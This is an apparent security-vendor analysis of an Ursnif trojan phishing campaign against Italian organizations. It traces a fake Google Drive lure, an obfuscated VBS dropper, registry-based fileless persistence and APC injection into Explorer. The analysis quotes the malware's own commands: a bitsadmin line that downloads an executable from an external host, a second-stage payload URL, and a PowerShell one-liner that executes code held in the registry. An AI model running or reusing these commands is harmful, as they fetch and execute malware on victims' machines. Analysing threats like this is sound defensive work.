The Ursnif trojan confirms itself as one of the most active malware threats in cyberspace, even during the past days, when new attack attempts reached several organizations across Italy.
Unlike previous waves, this one does not leverage steganography or heavily obfuscated powershell payloads. Instead, it abuses a VB script hidden into a compressed archive embedded within an innocent looking email referencing a summon. When users click on “Decreto” hyperlink, they are redirected to a Google Drive web page which opens a fake page where a fake document is shown and it invites them to click on a download link
Once clicked on the “Scarica il documento” link into the Drive document, an archive is downloaded on the victim machine from blogger[.]scentasticyoga[.]com, embedding two different files: the first is an obfuscated Visual Basic Script (VBS) and the second one is a legit image placed there to deceive the victim.
The VBS code is obfuscated to evade antivirus detection and, in order to confuse the analyst, all the values are manipulated in different steps: using many mathematical operations, very long random variable names and other content encoded in Base64 format. The malicious routine is split in many slices and then recombined at runtime, quite basic but it is effective evasion technique. After a first de-obfuscation phase, a more readable code could be obtained.
In the end, the infection starts and the malware runs cmd.exe to download the “eyTWUDW.exe” through the Bitsadmin utility, and store it into “%APPDATA%\Local\Temp”.
|“C:\Windows\System32\cmd.exe” /c bitsadmin /transfer msd5 /priority foreground http://blog.practicereiki.com/pagpoftrh54.php C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe|
The Bitsadmin utility is legit Microsoft command line tool typically used by sysadmins to download system updates, but during the last years it has also been abused by cyber criminals to masquerade malicious network activities. In this case it has been leveraged to manage the download of the next component of the infection chain from “hxxp://blog[.practicereiki[.com/pagpoftrh54[.php”.
After that, the loader runs “schtasks” to enable the execution of the “eyTWUDW.exe” payload temporary stored in “%APPDATA%\Local\Temp”, and then downloads the next malware stage from
|http[://link[.kunstsignal[.net/images/W534K5hp8zGWYvpMJkayjGf/FqWxvwp_2F/1_2BEPHtH1r_2FpG5 /o0BuA8sr5LGg /IDwj8Q6mCoq/5nK9XEb3WoD5wW/y8lJVn5t5QXZMUgDQopzF /oO58ImaZl53M5X3E/whzGq3GIOtuCnK6/o3R_2BwMMv/wAo5qeqZ/a[.avi|
Through the mentioned URL, it was possible to intercept the downloaded encrypted payload, sub-sequentially digested by the “eyTWUDW.exe“ process which, after an internal decryption phase, stores it into a registry key, establishing a file-less persistence on the target machine.
Moreover, the malware contacts another time the C2 to confirm the successful infection, sending a check-in HTTP request containing parameters used to identify the malware implant:
|version||214071||Malware software version|
|user||b2861874feedbf530d08c77a9d5833de||User id of the infected machine|
|id||822||Synthetic id of infected machine|
|uptime||235||Time of infection start|
Table 1: Ursnif infection format
Investigating the remote destination where the C2 is hosted, it results active since 05 March 2019, just a few times before the attack wave; destination unknown to many AV Vendors at time of attack, suggesting this portion of the infrastructure has been specifically prepared for the Italian landscape.
At this point, “eyTWUDW.exe” runs the previously stored script through the following command, invoking Powershell code from the registry sub-key “amxrters”.
|powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).amxrters))|
The content of this additional script is obfuscated with layers of Base-64 encoding, arrays of integers and char-code to byte conversions. Dissecting the script we obtained a more readable code:
The first part contains dependencies loaded by the malware to interact with the OS, such as the classic “kernel32” and, more interestingly, one of the last called functions reveal the usage of the same APC injection techniques observed in previous attack waves to inject the payload into the “Explorer.exe“ process (rif. “QueueUserAPC” in “Dissecting the Latest Ursnif DHL themed Campaign”). The de-obfuscation of the central part of the script reveals the classical string “This program cannot be run in DOS mode”, part of the header of the final stage of the malware will be injected into the Explorer process.
After noticing the payload is very similar to another Ursnif sample yet analyzed in “Ursnif Long Live the Steganography”, we proceeded with a differential analysis to spot eventual variations between the samples.
At first look, there are many common parts between the samples, for instance both files are compiled in 64 bit mode and the value in the PE sections are closely similar. However, the compilation time were different: while the older is the 28th January, the newer one is 11 March, almost a week after the comparison on the internet of the command and control server host 46.8.18[.186 (CONTEL-NET-3 RU).
Ursnif confirms itself as one of the most active and aggressive malware threats spreading both worldwide and within the Italian cyber-landscape. Threat actors behind these attacks constantly update and vary their infection chains to avoid security controls and evade antivirus detection, luring users with context sounding email messages being opened by thousands of victims each attack wave. A serious threat for the security of users data and company assets.
Additional details, including Indicators of Compromise and Yara